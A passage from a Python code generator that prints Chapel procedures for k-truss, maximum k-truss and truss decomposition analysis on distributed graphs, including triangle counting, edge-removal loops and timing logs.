if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
'''
MaxTrussMixAtomic=MaxTrussStart+MixMinSearchAffectedEdgeRemoval
TrussEndCheck='''
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
if (RemovedEdge.read()<Ne) {
AllRemoved=false;
}
'''
MaxTrussEndCheck='''
N2+=1;
}// end while
var tmpi=0;
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
'''
DecompositionEndCheck='''
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
if (ConFlag==false) {
if (RemovedEdge.read()<Ne) {
ConFlag=true;
k=k+1;
largest=RemovedEdge.read();
}
}
//writeln("In ", N2, " iteraton,", RemovedEdge.read(), " edges have been removed");
N2+=1;
}// end while
timer.stop();
'''
def GenTrussOutput(name):
print(' outMsg="After '+name+', Given K ="+k:string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
print(' outMsg="After '+name+', Total execution time="+(timer.elapsed()):string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
print(' outMsg="After '+name+', Total number of iterations ="+N2:string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
print(' outMsg="After '+name+', The k truss has edges ="+(Ne-RemovedEdge.read()):string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
def GenDecompositionOutput(name):
print(' outMsg="After '+name+', Max K ="+(k-1):string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
print(' outMsg="After '+name+', Total execution time="+(timer.elapsed()):string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
print(' outMsg="After '+name+', Total number of iterations ="+N2:string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
print(' outMsg="After '+name+', The largest number of k truss edges ="+(Ne-largest):string;')
print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
def GenReturn(FunName):
text='''
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
'''
lastone=" }// end of proc "+FunName
print(text)
print(lastone)
print("")
print("")
print("")
def GenMaxReturn(FunName):
text='''
return true;
'''
lastone=" }// end of proc "+FunName
print(text)
print(lastone)
print("")
print("")
print("")
def GenTrussFun(FunName,Parameters,BodyCode):
head=" proc "+FunName+Parameters
print(head)
print(FunStart)
print(BodyCode)
print(TrussEndCheck)
GenTrussOutput(FunName)
GenReturn(FunName)
def GenMaxTrussFunAtomic(FunName,MaxParameters,BodyCode):
head=" proc "+FunName+MaxParameters
print(head)
print(MaxFunStartAtomic)
print(BodyCode)
print(MaxTrussEndCheck)
GenMaxReturn(FunName)
def GenDecompositionFun(FunName,Parameters,BodyCode):
head=" proc "+FunName+Parameters
print(head)
print(FunStart)
print(BodyCode)
print(DecompositionEndCheck)
GenDecompositionOutput(FunName)
GenReturn(FunName)
def GenNaiveTrussTest(FunName):
text1='''
PTriCount=0;
'''
text2='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
'''
print(text1)
print(" repMsg="+FunName+"(kValue,")
print(text2)
def GenNaiveDecompositionTest(FunName):
text1='''
PTriCount=0;
'''
text2='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, PTriCount);
'''
print(text1)
print(" repMsg="+FunName+"(3,")
print(text2)
def GenTrussAtomicTest(FunName):
text1='''
forall i in AtoTriCount {
i.write(0);
}
'''
text2='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
'''
print(text1)
print(" repMsg="+FunName+"(kValue,")
print(text2)
def GenMaxTrussAtomicTest(FunName1,FunName2):
text1='''
maxtimer.clear();
forall i in 0..Ne-1 {
aPTriCount[i].write(0);
aPlTriCount[i].write(0);
}
EdgeDeleted=-1;
lEdgeDeleted=-1;//for local use
maxtimer.start();
kLow=3;
// we first check kLow=3
'''
text2=" repMsg="+FunName1+"(kLow,"
text3='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount);
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
aPTriCount[i].write(aPlTriCount[i].read());
}
kUp=getupK(toSymEntry(ag.getNEIGHBOR(), int).a, toSymEntry(ag.getNEIGHBOR_R(), int).a);
outMsg="Estimated kUp="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if ((!AllRemoved) && (kUp>3)) {// we need to check if max k >3
var ConLoop=true:bool;
while ( (ConLoop) && (kLow<kUp)) {
// we will continuely check if the up value can remove all edges
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(aPTriCount[i].read());
}
// we check the larget k vaule kUp which is the upper bound of max k
// we will use kMid to reduce kUp
'''
text4=" AllRemoved="+FunName2+"(kUp,"
text5='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (!AllRemoved) { //the up value is the max k
ConLoop=false;
} else {// we will check the mid value to reduce kUp
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(aPTriCount[i].read());
}
//"Try mid=",kMid);
'''
text6=" AllRemoved="+FunName2+"(kMid,"
text7='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (AllRemoved) { // if mid value can remove all edges, we will reduce the up value for checking
kUp=kMid-1;
} else { // we will improve both low and mid value
if kMid>=kUp-1 {
ConLoop=false;
kUp=kMid;
} else {// we will update the low value and then check the mid value
// until all edges are removed
while ((AllRemoved==false) && (kMid<kUp-1)) {
kLow=kMid;
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
EdgeDeleted[i]=lEdgeDeleted[i];
aPTriCount[i].write(aPlTriCount[i].read());
}
//("Try mid again=",kMid);
'''
text8=" AllRemoved="+FunName2+"(kMid,"
text9='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
}
if (!AllRemoved) {
kUp=kMid;
ConLoop=false;
} else {
kUp=kMid-1;
}
}
}
}
}// end of while
var countName = st.nextName();
var countEntry = new shared SymEntry(lEdgeDeleted);
st.addEntry(countName, countEntry);
repMsg = 'created ' + st.attrib(countName);
maxtimer.stop();
'''
text10=' outMsg="After '+FunName2+', Total execution time ="+(maxtimer.elapsed()):string;'
text11='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
'''
text12=' outMsg="After '+FunName2+', Max k="+kUp:string;'
text13='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {//kUp<=3 or AllRemoved==true
maxtimer.stop();
'''
text14=' outMsg="After '+FunName2+',Total execution time ="+(maxtimer.elapsed()):string;'
text15='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if (AllRemoved==false) {
'''
text16=' outMsg="After '+FunName2+', Max k=3";'
text17='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {
'''
text18=' outMsg="After '+FunName2+',Max k=2";'
text19='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
}
}
'''
print(text1)
print(text2)
print(text3)
print(text4)
print(text5)
print(text6)
print(text7)
print(text8)
print(text9)
print(text10)
print(text11)
print(text12)
print(text13)
print(text14)
print(text15)
print(text16)
print(text17)
print(text18)
print(text19)
def GenDecompositionAtomicTest(FunName):
text1='''
forall i in AtoTriCount {
i.write(0);
}
'''
text2='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
'''
print(text1)
print(" repMsg="+FunName+"(3,")
print(text2)
def GenTrussTest():
text1='''
if (kValue>0) {// k-truss analysis
'''
text2='''
var PTriCount=makeDistArray(Ne,int);
'''
print(text1)
print(text2)
GenNaiveTrussTest("kTrussNaiveListIntersection")
GenNaiveTrussTest("kTrussNaiveSetSearchSmall")
GenNaiveTrussTest("kTrussNaiveSetSearchSmallSeq")
GenNaiveTrussTest("kTrussNaivePathMerge")
GenNaiveTrussTest("kTrussNaiveMinSearch")
text3='''
var AtoTriCount=makeDistArray(Ne,atomic int);
'''
print(text3)
GenTrussAtomicTest("kTruss")
GenTrussAtomicTest("kTrussMix")
text4='''
}// end of k-truss analysis
'''
print(text4)
def GenMaxTrussTest():
text1='''
if (kValue==-1) {// max k-truss analysis
'''
text2='''
var PTriCount=makeDistArray(Ne,int);
'''
print(text1)
print(text2)
# GenNaiveMaxTrussTest("kTrussNaiveListIntersection","OnceTrussNaiveListIntersection")
# GenNaiveMaxTrussTest("kTrussNaiveSetSearchSmall","OnceTrussNaiveSetSearchSmall")
# GenNaiveMaxTrussTest("kTrussNaiveSetSearchSmallSeq","OnceTrussNaiveSetSearchSmallSeq")
# GenNaiveMaxTrussTest("kTrussNaivePathMerge","OnceTrussNaivePathMerge")
# GenNaiveMaxTrussTest("kTrussNaiveMinSearch","OnceTrussNaiveMinSearch")
text3='''
var aPTriCount=makeDistArray(Ne,atomic int);//keep the last no all removed results
var aPlTriCount=makeDistArray(Ne,atomic int);//for local use
'''
print(text3)
GenMaxTrussAtomicTest("kTruss","OnceMaxTruss")
GenMaxTrussAtomicTest("kTrussMix","OnceMaxTrussMix")
text4='''
}// end of max k-truss analysis
'''
print(text4)
def GenDecompositionTest():
text1='''
if (kValue==-2) {
var PTriCount=makeDistArray(Ne,int);
'''
print(text1)
# GenNaiveDecompositionTest("TrussDecompositionNaiveListIntersection")
# GenNaiveDecompositionTest("TrussDecompositionNaiveSetSearchSmall")
# GenNaiveDecompositionTest("TrussDecompositionNaiveSetSearchSmallSeq")
GenNaiveDecompositionTest("TrussDecompositionNaivePathMerge")
GenNaiveDecompositionTest("TrussDecompositionNaiveMinSearch")
text3='''
var AtoTriCount=makeDistArray(Ne,atomic int);
'''
print(text3)
GenDecompositionAtomicTest("TrussDecomposition")
GenDecompositionAtomicTest("TrussMixDecomposition")
text4='''
}// end of truss decomposition analysis
'''
print(text4)
BeginCode='''
module TrussMsg {
use Reflection;
use ServerErrors;
use Logging;
use Message;
use SegmentedArray;
use ServerErrorStrings;
use ServerConfig;
use MultiTypeSymbolTable;
use MultiTypeSymEntry;
use IO;
use SymArrayDmap;
use RadixSortLSD;
use Set;
use DistributedBag;
use Time;
use CommAggregation;
use Sort;
use Map;
use DistributedDeque;
use Atomics;
use IO.FormattedIO;
use GraphArray;
use GraphMsg;
private config const logLevel = LogLevel.DEBUG;
const smLogger = new Logger(logLevel);
var outMsg:string;
proc segTrussMsg(cmd: string, payload: string, st: borrowed SymTab): MsgTuple throws {
//In this procedure, we implement different Truss analysis methods, including k-truss, max truss and truss decomposition
var repMsg: string;
var (kTrussN,n_verticesN, n_edgesN, directedN, weightedN, graphEntryName, restpart )
= payload.splitMsgToTuple(7);
var kValue=kTrussN:int;
var Nv=n_verticesN:int;
var Ne=n_edgesN:int;
var Directed=false:bool;
var Weighted=false:bool;
if ((directedN:int)==1){
Directed=true;
}
if ((weightedN:int)==1) {
Weighted=true;
}
var countName:string;
var StartEdgeAry: [0..numLocales-1] int;
var EndEdgeAry: [0..numLocales-1] int;
var RemoteAccessTimes: [0..numLocales-1] int;
var LocalAccessTimes: [0..numLocales-1] int;
var EdgeCnt: [0..Ne] int;
var EdgeFlags:[0..Ne] int;
var EdgeCount:[0..Ne] int;
StartEdgeAry=-1;
EndEdgeAry=-1;
RemoteAccessTimes=0;
LocalAccessTimes=0;
EdgeCnt=0;
EdgeFlags = 0;
EdgeCount = 0;
var srcN, dstN, startN, neighbourN,vweightN,eweightN, rootN :string;
var srcRN, dstRN, startRN, neighbourRN:string;
var repCount=0:int;
var gEntry:borrowed GraphSymEntry = getGraphSymEntry(graphEntryName, st);
var ag = gEntry.graph;
var EdgeDeleted=makeDistArray(Ne,int); //we need a global instead of local array
var lEdgeDeleted=makeDistArray(Ne,int); //we need a global instead of local array
var AllRemoved:bool;
EdgeDeleted=-1;
lEdgeDeleted=-1;
var kLow=3:int;
var kUp:int;
var kMid:int;
var maxtimer:Timer;
// this can be a general procedure to check if x is in given range so we put it outside
proc xlocal(x :int, low:int, high:int):bool{
if (low<=x && x<=high) {
return true;
} else {
return false;
}
}
// binary search if key is in ary from index l to h
proc binSearchE(ary:[?D] int,l:int,h:int,key:int):int {
//if ( (l<D.low) || (h>D.high) || (l<0)) {
// return -1;
//}
if ( (l>h) || ((l==h) && ( ary[l]!=key))) {
return -1;
}
if (ary[l]==key){
return l;
}
if (ary[h]==key){
return h;
}
var m= (l+h)/2:int;
if ((m==l) ) {
return -1;
}
if (ary[m]==key ){
return m;
} else {
if (ary[m]<key) {
return binSearchE(ary,m+1,h,key);
}
else {
return binSearchE(ary,l,m-1,key);
}
}
}// end of proc
//estimate the max k for given graph
proc getupK(nei:[?D1] int, neiR:[?D11] int):int {
var dNumber: [0..Nv-1] int;
dNumber=0;
var maxk=0:int;
for i in 0..Nv-1 {
if nei[i]+neiR[i]>=Nv-1 {
dNumber[Nv-1]+=1;
} else {
dNumber[nei[i]+neiR[i]]+=1;
}
}
//writeln("Degree value=",dNumber);
var tmpi=Nv-1:int;
while tmpi>0 {
dNumber[tmpi-1]+=dNumber[tmpi];
if dNumber[tmpi-1]>=tmpi {
maxk=tmpi;
break;
}
tmpi=tmpi-1;
}
return maxk;
}
'''
#The following is the original code
'''
// Begin of KTruss analysis series
// For undirected graph, using Naive and list intersection method. It should have worst performance.
// This procedure is just used for worst case test
proc kTrussNaiveListIntersection(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection,Given k="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersection
// For undirected graph, using naive method. Its performance should be worse, but it is a simple implementation to
// check the correctness of the results
proc kTrussNaiveListIntersectionSmall(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
forall x in dst[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
forall s in sVadj with ( + reduce Count) {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection Small,Given k="+k:string+" All removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small,Total number of iterations ="+N2:string;
